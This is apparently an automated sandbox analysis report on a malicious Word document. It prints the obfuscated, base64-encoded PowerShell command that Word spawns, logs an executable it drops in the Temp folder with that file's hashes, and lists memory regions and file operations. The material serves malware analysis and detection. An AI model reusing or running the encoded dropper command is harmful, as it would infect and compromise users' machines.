Get Address Unknown module name function = OleLoadPicture, address_out = 0x76c07c49 True 1
Fn
Get Address Unknown module name function = OleCreatePropertyFrameIndirect, address_out = 0x76c093fc True 1
Fn
Get Address Unknown module name function = OleCreatePropertyFrame, address_out = 0x76c0944a True 1
Fn
Get Address Unknown module name function = OleIconToCursor, address_out = 0x76c0776e True 1
Fn
Get Address Unknown module name function = LoadTypeLibEx, address_out = 0x76bb07b7 True 1
Fn
Get Address Unknown module name function = OleLoadPictureEx, address_out = 0x76c070a1 True 1
Fn
Get Address Unknown module name function = 600, address_out = 0x721a2b76 True 1
Fn
Process #2: powershell.exe
(Host: 729, Network: 52)
+
Information Value
ID #2
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAUA
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:23, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:02:02
OS Process Information
+
Information Value
PID 0xa68
Parent PID 0x9c4 (c:\program files\microsoft office\office15\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A6C
0x A80
0x A84
0x A88
0x A8C
0x A90
0x A94
0x A9C
0x AA4
0x AA8
0x AAC
0x AB0
0x ACC
0x AD8
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000050000 0x00050000 0x00056fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True True False
locale.nls 0x00170000 0x001d6fff Memory Mapped File Readable False False False
powershell.exe.mui 0x001e0000 0x001e2fff Memory Mapped File Readable, Writable False False False
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable True True False
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True True False
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000250000 0x00250000 0x00317fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000330000 0x00330000 0x00330fff Pagefile Backed Memory Readable True False False
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000350000 0x00350000 0x00450fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000460000 0x00460000 0x0105ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001060000 0x01060000 0x01061fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001070000 0x01070000 0x01070fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001080000 0x01080000 0x01081fff Pagefile Backed Memory Readable True False False
private_0x0000000001090000 0x01090000 0x010cffff Private Memory Readable, Writable True True False
pagefile_0x00000000010d0000 0x010d0000 0x011aefff Pagefile Backed Memory Readable True False False
private_0x00000000011b0000 0x011b0000 0x011effff Private Memory Readable, Writable, Executable True True False
cversions.2.db 0x011f0000 0x011f3fff Memory Mapped File Readable True False False
pagefile_0x0000000001200000 0x01200000 0x01200fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001210000 0x01210000 0x0121ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x01220000 0x014eefff Memory Mapped File Readable False False False
cversions.2.db 0x014f0000 0x014f3fff Memory Mapped File Readable True False False
pagefile_0x0000000001500000 0x01500000 0x01500fff Pagefile Backed Memory Readable True False False
private_0x0000000001510000 0x01510000 0x0154ffff Private Memory Readable, Writable True True False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db 0x01550000 0x01575fff Memory Mapped File Readable True False False
private_0x0000000001580000 0x01580000 0x0167ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001680000 0x01680000 0x01a72fff Pagefile Backed Memory Readable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db 0x01a80000 0x01aaffff Memory Mapped File Readable True False False
pagefile_0x0000000001ab0000 0x01ab0000 0x01ab0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001ac0000 0x01ac0000 0x01ac0fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001ad0000 0x01ad0000 0x01adffff Private Memory True True False
private_0x0000000001ae0000 0x01ae0000 0x01b1ffff Private Memory Readable, Writable True True False
private_0x0000000001b20000 0x01b20000 0x01b2ffff Private Memory True True False
private_0x0000000001b30000 0x01b30000 0x01b3ffff Private Memory True True False
private_0x0000000001b40000 0x01b40000 0x01b7ffff Private Memory Readable, Writable True True False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x01b80000 0x01be5fff Memory Mapped File Readable True False False
private_0x0000000001bf0000 0x01bf0000 0x01bfffff Private Memory True True False
private_0x0000000001c00000 0x01c00000 0x01c0ffff Private Memory True True False
private_0x0000000001c10000 0x01c10000 0x01c1ffff Private Memory True True False
private_0x0000000001c20000 0x01c20000 0x01c5ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000001c60000 0x01c60000 0x01c9ffff Private Memory Readable, Writable True True False
private_0x0000000001ca0000 0x01ca0000 0x01d3ffff Private Memory Readable, Writable True True False
private_0x0000000001d40000 0x01d40000 0x01d4ffff Private Memory Readable, Writable True True False
l_intl.nls 0x01d50000 0x01d52fff Memory Mapped File Readable False False False
private_0x0000000001d60000 0x01d60000 0x01d60fff Private Memory Readable, Writable True True False
sorttbls.nlp 0x01d70000 0x01d74fff Memory Mapped File Readable False False False
microsoft.wsman.runtime.dll 0x01d80000 0x01d87fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000001d90000 0x01d90000 0x01d90fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001da0000 0x01da0000 0x01da0fff Pagefile Backed Memory Readable True False False
private_0x0000000001da0000 0x01da0000 0x01daffff Private Memory True True False
private_0x0000000001db0000 0x01db0000 0x01deffff Private Memory Readable, Writable True True False
kernelbase.dll.mui 0x01df0000 0x01eaffff Memory Mapped File Readable, Writable False False False
sortkey.nlp 0x01eb0000 0x01ef0fff Memory Mapped File Readable False False False
pagefile_0x0000000001f00000 0x01f00000 0x01f10fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001f20000 0x01f20000 0x01f2ffff Private Memory True True False
private_0x0000000001f30000 0x01f30000 0x01f6ffff Private Memory Readable, Writable True True False
private_0x0000000001f70000 0x01f70000 0x01f7ffff Private Memory True True False
private_0x0000000001f80000 0x01f80000 0x01f8ffff Private Memory Readable, Writable True True False
private_0x0000000001f90000 0x01f90000 0x03f8ffff Private Memory Readable, Writable True False False
system.management.automation.dll 0x03f90000 0x04271fff Memory Mapped File Readable, Writable, Executable False False False
system.transactions.dll 0x04280000 0x042c2fff Memory Mapped File Readable, Writable, Executable False False False
mscorrc.dll 0x042d0000 0x04323fff Memory Mapped File Readable True False False
private_0x0000000004330000 0x04330000 0x0433ffff Private Memory True True False
private_0x0000000004340000 0x04340000 0x0434ffff Private Memory True True False
private_0x0000000004350000 0x04350000 0x0435ffff Private Memory True True False
private_0x0000000004360000 0x04360000 0x0436ffff Private Memory True True False
powershell.exe 0x22160000 0x221d1fff Memory Mapped File Readable, Writable, Executable False False False
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False
system.directoryservices.ni.dll 0x60820000 0x60933fff Memory Mapped File Readable, Writable, Executable True False False
system.management.ni.dll 0x60940000 0x60a43fff Memory Mapped File Readable, Writable, Executable True False False
system.xml.ni.dll 0x60a50000 0x60f85fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.management.ni.dll 0x60f90000 0x61052fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.utility.ni.dll 0x61060000 0x611fdfff Memory Mapped File Readable, Writable, Executable True False False
system.core.ni.dll 0x61200000 0x61434fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.ni.dll 0x61440000 0x61cb9fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.dll 0x61cc0000 0x61fa1fff Memory Mapped File Readable, Writable, Executable False False False
system.ni.dll 0x61fb0000 0x6274bfff Memory Mapped File Readable, Writable, Executable True False False
mscorlib.ni.dll 0x62750000 0x63247fff Memory Mapped File Readable, Writable, Executable True False False
mscorwks.dll 0x63250000 0x637fafff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.ni.dll 0x639d0000 0x63a6bfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.wsman.management.ni.dll 0x63a70000 0x63af4fff Memory Mapped File Readable, Writable, Executable True False False
mscoreei.dll 0x63d80000 0x63df9fff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x6bbc0000 0x6bc09fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.security.ni.dll 0x6d090000 0x6d0bcfff Memory Mapped File Readable, Writable, Executable True False False
system.configuration.install.ni.dll 0x6d0c0000 0x6d0e4fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.consolehost.ni.dll 0x6d0f0000 0x6d170fff Memory Mapped File Readable, Writable, Executable True False False
msvcr80.dll 0x6d180000 0x6d21afff Memory Mapped File Readable, Writable, Executable False False False
microsoft.powershell.commands.diagnostics.ni.dll 0x6d460000 0x6d4aafff Memory Mapped File Readable, Writable, Executable True False False
linkinfo.dll 0x6f110000 0x6f118fff Memory Mapped File Readable, Writable, Executable False False False
shdocvw.dll 0x6f120000 0x6f14dfff Memory Mapped File Readable, Writable, Executable False False False
ntshrui.dll 0x70100000 0x7016ffff Memory Mapped File Readable, Writable, Executable False False False
cscapi.dll 0x70170000 0x7017afff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
shfolder.dll 0x72040000 0x72044fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
slc.dll 0x74190000 0x74199fff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x741c0000 0x741d3fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74600000 0x746f4fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74940000 0x74948fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74c20000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x75290000 0x752a8fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x773f0000 0x773f4fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd3000 0x7ffd3000 0x7ffd3fff Private Memory Readable, Writable True True False
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True True False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True True False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True True False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
For performance reasons, the remaining 71 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe 100.00 KB (102400 bytes) MD5: d6c8126371d37ffe3100755db6aa22ed
SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42
SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec
False
Host Behavior
COM (1)
+
Operation Class Interface Additional Information Success Count Logfile
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (328)
+
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.config type = file_attributes False 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
